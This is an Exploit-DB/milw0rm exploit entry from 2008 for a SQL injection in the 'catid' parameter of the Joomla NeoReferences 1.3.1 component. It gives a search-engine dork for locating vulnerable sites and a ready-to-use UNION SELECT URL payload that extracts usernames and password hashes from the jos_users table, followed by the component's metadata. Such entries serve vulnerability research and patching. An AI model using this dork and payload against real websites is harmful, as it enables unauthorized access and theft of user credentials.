Joomla! Component NeoReferences 1.3.1 - 'catid' SQL Injection

EDB-ID:

5034


Author:

S@BUN

Type:

webapps


Platform:

PHP

Date:

2008-02-01


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#########################################################################
#
# joomla SQL Injection(com_neoreferences)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_neoreferences"
#
########################################################################
EXPLOIT :

index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*


#########################################################################
# S@BUN                           www.hackturkiye.com                       S@BUN
#########################################################################
# S@BUN                              GOOD LUCKY                                S@BUN
#########################################################################

added notes:
	<name>NeoReferences</name>
	<creationDate>December 2006</creationDate>
	<author>NeoJoomla</author>
	<license>Released under CREATIVE COMMONS License</license>
	<copyright>Copyright (C) 2006 Neoweb</copyright>

	<authorEmail>support@neojoomla.com</authorEmail>
	<authorUrl>www.neojoomla.com</authorUrl>
	<version>1.3.1</version>
	<description><![CDATA[NeoReferences is component which enables you to manage your current and future references by category and thanks to a system of thumbnails clear and very visual!
You can add an image for each reference which will be resized by the component, just click on it to see the complete view.<br />Developped by NeoJoomla.]]></description>

# milw0rm.com [2008-02-01]